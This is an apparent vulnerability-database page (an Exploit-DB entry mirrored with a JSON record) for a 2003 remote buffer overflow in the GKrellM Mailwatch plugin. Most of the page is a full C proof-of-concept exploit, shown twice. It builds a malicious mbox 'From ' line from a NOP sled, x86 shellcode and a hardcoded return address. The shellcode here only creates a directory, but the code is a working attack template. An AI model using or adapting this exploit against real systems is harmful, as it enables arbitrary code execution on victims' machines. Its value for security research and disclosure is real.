Search...

GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow Vulnerability

2003-07-06T00:00:00

ID EDB-ID:22873
Type exploitdb
Reporter isox
Modified 2003-07-06T00:00:00

Description

GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow Vulnerability. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/8118/info

It has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program.

/*
 * Proof of Concept code for a buffer overflow in  gkrellm plugin gkrellm-mailwatch 2.4.2
 *
 * Overflow occurs in when processing the "From " (not "From: ")
 * field of the email.  This is remotely exploitable if you can pass 
 * shellcode through the mail servers with out it getting foobar'ed
 * in the process.
 * 
 * Since this is just POC, this will create a directory called hacked in gkrellm's CWD.
 * 
 * One last note, it appends to the file you create, so feel free to append to
 * your /var/spool/mail entry.
 */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;

#define RET 0xbffff36d
#define NOP 0x90
#define LEN 520

/* Zillion's mkdir hacked from www.safemode.org */
char code[]=
        "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
        "\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
        "\x61\x63\x6b\x65\x64\x23";


int main(int argc, char **argv) {
  int i = 0, offset = 0;
  char ch, *mfile = NULL, *p = NULL, buf[5 + LEN + 6 + 2 + 3 + 1 + 3 + 2 + 1 + 8 + 1 + 4 + 2];  // From %s@foo.bar  Thu Jun 26 16:45:16 2003\n\0
  long ret = RET, *paddr = NULL;
  FILE *fd;
  
  if(argc &lt; 2) {
    fprintf(stderr, "usage: %s &lt;-m outfile&gt; [-o offset] [-h]\n", argv[0]);
    exit(1);
  }

  while((ch = getopt(argc, argv, "m:o:h")) != -1) {
    switch(ch) {
      case 'h':
        fprintf(stderr, "usage: %s &lt;-m outfile&gt; [-o offset] [-h]\n", argv[0]);
        exit(1);
      break;

      case 'o':
        ret -= atoi(optarg);
      break;

      case 'm':
        if(!(mfile = malloc(strlen(optarg)+1))) {
          perror("malloc");
          exit(1);
        }
        strcpy(mfile, optarg);
      break; 
    }
  }

  if(!mfile) {
    fprintf(stderr, "usage: %s &lt;-m outfile&gt; [-o offset] [-h]\n", argv[0]);
    exit(1);
  }

  fprintf(stderr, "[+] ret 0x%lx\n", ret);

  strcpy(buf, "From ");
  p = buf + 5;

  // nops
  for(i=0; i&lt;LEN-strlen(code)-4; i++)
    *(p++) = NOP;

  // shellcode
  for(i=0; i&lt;strlen(code); i++)
    *(p++) = code[i];

  // address
  paddr = (long *)p;
  for(i=0; i&lt;4; i+=4)
    *(paddr++) = ret;

  // terminate and concatenate
  *(p+4) = 0;
  strcat(buf, "@foo.bar  Thu Jun 26 16:45:16 2003\n");
  
  // check for an outfile, otherwise send to stdout
  if(mfile) {
    if(!(fd = fopen(mfile, "a"))) {
      perror("fopen");
      exit(1);
    }
    fprintf(stderr, "[+] out %s\n", mfile);
  } else {
    fd = stdout;
    fprintf(stderr, "[+] out stdout\n");
  }

  fputs(buf, fd); 
  fputs("Return-Path: &lt;root@foo.bar&gt;\n", fd);
  fputs("Received: from localhost (localhost [127.0.0.1])", fd);
  fputs("\tby localhost (8.12.4/8.12.4) with ESMTP id h5QNPG2q003945\n", fd);
  fputs("\tfor &lt;root@foo.bar&gt;; Thu, 26 Jun 2003 16:45:16 -0700\n", fd);
  fputs("Received: (from root@foo.bar)\n", fd);
  fputs("\tby localhost (8.12.4/8.12.4/Submit) id h5QNPGuc004172\n", fd);
  fputs("\tfor root; Thu, 26 Jun 2003 16:45:16 -0700\n", fd);
  fputs("Date: Thu, 26 Jun 2003 16:45:12 -0700\n", fd);
  fputs("From: root@foo.bar\n", fd);
  fputs("Message-Id: &lt;200306262325.h5QNPGuc003744@localhost&gt;\n", fd);
  fputs("To: root@foo.bar\n", fd);
  fputs("Subject: foobar\n\n", fd);
  fputs("foobar\n\n", fd);

  fclose(fd);
  free(mfile);
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:22873", "type": "exploitdb", "bulletinFamily": "exploit", "title": "GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow Vulnerability", "description": "GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow Vulnerability. Remote exploit for linux platform", "published": "2003-07-06T00:00:00", "modified": "2003-07-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/22873/", "reporter": "isox", "references": [], "cvelist": [], "lastseen": "2016-02-02T19:44:53", "viewCount": 3, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2016-02-02T19:44:53", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-02T19:44:53", "rev": 2}, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/22873/", "sourceData": "source: http://www.securityfocus.com/bid/8118/info\r\n\r\nIt has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program.\r\n\r\n/*\r\n * Proof of Concept code for a buffer overflow in gkrellm plugin gkrellm-mailwatch 2.4.2\r\n *\r\n * Overflow occurs in when processing the \"From \" (not \"From: \")\r\n * field of the email. This is remotely exploitable if you can pass \r\n * shellcode through the mail servers with out it getting foobar'ed\r\n * in the process.\r\n * \r\n * Since this is just POC, this will create a directory called hacked in gkrellm's CWD.\r\n * \r\n * One last note, it appends to the file you create, so feel free to append to\r\n * your /var/spool/mail entry.\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#define RET 0xbffff36d\r\n#define NOP 0x90\r\n#define LEN 520\r\n\r\n/* Zillion's mkdir hacked from www.safemode.org */\r\nchar code[]=\r\n \"\\xeb\\x16\\x5e\\x31\\xc0\\x88\\x46\\x06\\xb0\\x27\\x8d\\x1e\\x66\\xb9\\xed\"\r\n \"\\x01\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x68\"\r\n \"\\x61\\x63\\x6b\\x65\\x64\\x23\";\r\n\r\n\r\nint main(int argc, char **argv) {\r\n int i = 0, offset = 0;\r\n char ch, *mfile = NULL, *p = NULL, buf[5 + LEN + 6 + 2 + 3 + 1 + 3 + 2 + 1 + 8 + 1 + 4 + 2]; // From %s@foo.bar Thu Jun 26 16:45:16 2003\\n\\0\r\n long ret = RET, *paddr = NULL;\r\n FILE *fd;\r\n \r\n if(argc < 2) {\r\n fprintf(stderr, \"usage: %s <-m outfile> [-o offset] [-h]\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n while((ch = getopt(argc, argv, \"m:o:h\")) != -1) {\r\n switch(ch) {\r\n case 'h':\r\n fprintf(stderr, \"usage: %s <-m outfile> [-o offset] [-h]\\n\", argv[0]);\r\n exit(1);\r\n break;\r\n\r\n case 'o':\r\n ret -= atoi(optarg);\r\n break;\r\n\r\n case 'm':\r\n if(!(mfile = malloc(strlen(optarg)+1))) {\r\n perror(\"malloc\");\r\n exit(1);\r\n }\r\n strcpy(mfile, optarg);\r\n break; \r\n }\r\n }\r\n\r\n if(!mfile) {\r\n fprintf(stderr, \"usage: %s <-m outfile> [-o offset] [-h]\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n fprintf(stderr, \"[+] ret 0x%lx\\n\", ret);\r\n\r\n strcpy(buf, \"From \");\r\n p = buf + 5;\r\n\r\n // nops\r\n for(i=0; i<LEN-strlen(code)-4; i++)\r\n *(p++) = NOP;\r\n\r\n // shellcode\r\n for(i=0; i<strlen(code); i++)\r\n *(p++) = code[i];\r\n\r\n // address\r\n paddr = (long *)p;\r\n for(i=0; i<4; i+=4)\r\n *(paddr++) = ret;\r\n\r\n // terminate and concatenate\r\n *(p+4) = 0;\r\n strcat(buf, \"@foo.bar Thu Jun 26 16:45:16 2003\\n\");\r\n \r\n // check for an outfile, otherwise send to stdout\r\n if(mfile) {\r\n if(!(fd = fopen(mfile, \"a\"))) {\r\n perror(\"fopen\");\r\n exit(1);\r\n }\r\n fprintf(stderr, \"[+] out %s\\n\", mfile);\r\n } else {\r\n fd = stdout;\r\n fprintf(stderr, \"[+] out stdout\\n\");\r\n }\r\n\r\n fputs(buf, fd); \r\n fputs(\"Return-Path: <root@foo.bar>\\n\", fd);\r\n fputs(\"Received: from localhost (localhost [127.0.0.1])\", fd);\r\n fputs(\"\\tby localhost (8.12.4/8.12.4) with ESMTP id h5QNPG2q003945\\n\", fd);\r\n fputs(\"\\tfor <root@foo.bar>; Thu, 26 Jun 2003 16:45:16 -0700\\n\", fd);\r\n fputs(\"Received: (from root@foo.bar)\\n\", fd);\r\n fputs(\"\\tby localhost (8.12.4/8.12.4/Submit) id h5QNPGuc004172\\n\", fd);\r\n fputs(\"\\tfor root; Thu, 26 Jun 2003 16:45:16 -0700\\n\", fd);\r\n fputs(\"Date: Thu, 26 Jun 2003 16:45:12 -0700\\n\", fd);\r\n fputs(\"From: root@foo.bar\\n\", fd);\r\n fputs(\"Message-Id: <200306262325.h5QNPGuc003744@localhost>\\n\", fd);\r\n fputs(\"To: root@foo.bar\\n\", fd);\r\n fputs(\"Subject: foobar\\n\\n\", fd);\r\n fputs(\"foobar\\n\\n\", fd);\r\n\r\n fclose(fd);\r\n free(mfile);\r\n exit(0);\r\n}", "osvdbidlist": []}